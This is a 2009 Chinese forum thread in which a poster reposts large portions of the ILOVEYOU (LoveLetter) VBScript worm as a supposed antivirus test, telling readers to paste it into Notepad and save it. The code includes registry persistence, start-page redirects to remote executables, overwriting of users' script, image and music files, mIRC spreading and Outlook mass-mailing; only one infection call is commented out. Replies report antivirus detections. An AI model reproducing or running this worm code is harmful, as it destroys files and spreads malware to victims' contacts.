找回密码
 注册
快捷导航
查看: 1739|回复: 6

【转帖】检测你的杀毒软件是否好用的新代码,非专业人士误入【系统崩溃我不负责】

[复制链接] |自动提醒
阅读字号:

694

回帖

0

积分

1515

资产值

入门会员 Rank: 1

注册时间
2009-10-1
发表于 2009-11-28 11:52:22| 字数 10,284| - 中国–北京–北京 鹏博士BGP | 显示全部楼层 |阅读模式
在记事本中输入
横线下面的全复制进去 横线不要复制
很多软件都查不出

保存格式为TXT或EXE
已知测试结果


---------------------------------------------------------



sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirs
ystem"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
",dirwin"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMT
FwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDG
FikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5h
fFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet
Explorer\Main\StartPage","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwt
uHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-
BUGSFIX.exe"
end if
end if
if (fileexist(downread"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",dow
nread"\WIN-BUGSFIX.exe"
regcreate
"HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage","about:blan
k"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path"\")
end if
Next
listadriv = s
end sub

sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or
(ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif (ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path".vbs")
fso.DeleteFile(f1.path)
elseif (ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or
(s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,if mIRC
will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly.
thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick"dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
'infectfiles(f1.path)

Rem ===============================================================
Rem 注意,上面这行被注释掉了,请千万不要玩火,否则您的文件将找不回来
Rem ================================================================

folderlist(f1.path)
next
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -
HTML<?-?TITLE><METANAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
LOVELETTER@-@>"vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?@GRAMMERSoft
Group ?-? Manila, Philippines ?-? March 2000@-@>"vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@*** but i think this is
good...@-@>"vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#
main#-#)@-@ "vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#
main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To
Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEEg
t;"vbcrlf& _
"<?-?BODY><?-?HTML>"vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"vbcrlf& _
"<!--?-??-?"vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"vbcrlf& _
"?-??-?-->"vbcrlf& _
"<?-?SCRIPT>"vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"vbcrlf& _
"<!--"vbcrlf& _
"on error resume next"vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"vbcrlf& _
"aw=1"vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"vbcrlf& _
"code2=replace(code,chr(91)chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"vbcrlf& _
"wri.close"vbcrlf& _
"if (fso.FileExists(dirsystem@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"vbcrlf& _
"aw=0"vbcrlf& _
"end if"vbcrlf& _
"if (aw=1) then"vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"vbcrlf& _
"window.close"vbcrlf& _
"end if"vbcrlf& _
"end if"vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MS
Kernel32@-@,dirsystem@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
T410 2522 i7 6G X-25M+FJ500G LED 6C
T400 X61 M705
IP4 Ipad2

80

回帖

0

积分

92

资产值

入门会员 Rank: 1

注册时间
2009-9-18
发表于 2009-11-28 11:56:03| 字数 27| - 中国–吉林–长春 联通 | 显示全部楼层
我一打开这个LZ 的这个窗口,我的NOD32就报警了……
回复 支持 反对

使用道具 举报

80

回帖

0

积分

92

资产值

入门会员 Rank: 1

注册时间
2009-9-18
发表于 2009-11-28 11:56:57| 字数 4| - 中国–吉林–长春 联通 | 显示全部楼层
我的%%

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

x
回复 支持 反对

使用道具 举报

694

回帖

0

积分

1515

资产值

入门会员 Rank: 1

注册时间
2009-10-1
 楼主| 发表于 2009-11-28 12:26:59| 字数 60| - 中国–北京–北京 鹏博士BGP | 显示全部楼层
QUOTE:
Posted by 83811804 on 2009-11-28 11:56
我的%%

Nod32直接不让访问网页么...
T410 2522 i7 6G X-25M+FJ500G LED 6C
T400 X61 M705
IP4 Ipad2
回复 支持 反对

使用道具 举报

2109

回帖

27

积分

4223

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2007-2-10
发表于 2009-11-28 13:30:15| 字数 149| - 中国–天津–天津 移动/GSM/TD-SCDMA/LTE共用出口 | 显示全部楼层
[DETECTION] Contains recognition pattern of the VBS/Loveletter.B VBS script virus
    [NOTE]      A backup was created as '4b84b572.qua'  ( QUARANTINE )
    [NOTE]      The file was deleted!

红伞
本账号被借用ing...
回复 支持 反对

使用道具 举报

2万

回帖

181

积分

2万

资产值

至尊会员II Rank: 4Rank: 4Rank: 4Rank: 4

注册时间
2007-7-27
发表于 2009-11-28 13:34:04| 字数 7| - 中国–河南–新乡 移动 | 显示全部楼层
麦咖啡没有反应
您好,你的签名涉嫌低俗内容,予以和谐.
要想恢复,两条中华,少一根免谈
回复 支持 反对

使用道具 举报

1240

回帖

16

积分

5444

资产值

白金会员 Rank: 3Rank: 3Rank: 3

注册时间
2004-2-24
发表于 2009-11-28 15:59:27| 字数 12| - 中国–浙江–湖州 电信 | 显示全部楼层
我的电脑马上就报警的了!
T22 PIII900 256M 40G 8XDVD
T400  2767   T9400/2G/250G/DVD-RW/BT/WIFI
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Powered by Discuz! X3.5 © 2001-2023 Comsenz Inc

GMT+8, 2025-1-22 12:39 , Processed in 0.101930 second(s), 37 queries , Gzip On, OPcache On.

手机版|小黑屋|安卓客户端|iOS客户端|Archiver|备用网址1|备用网址2|在线留言|专门网

返回顶部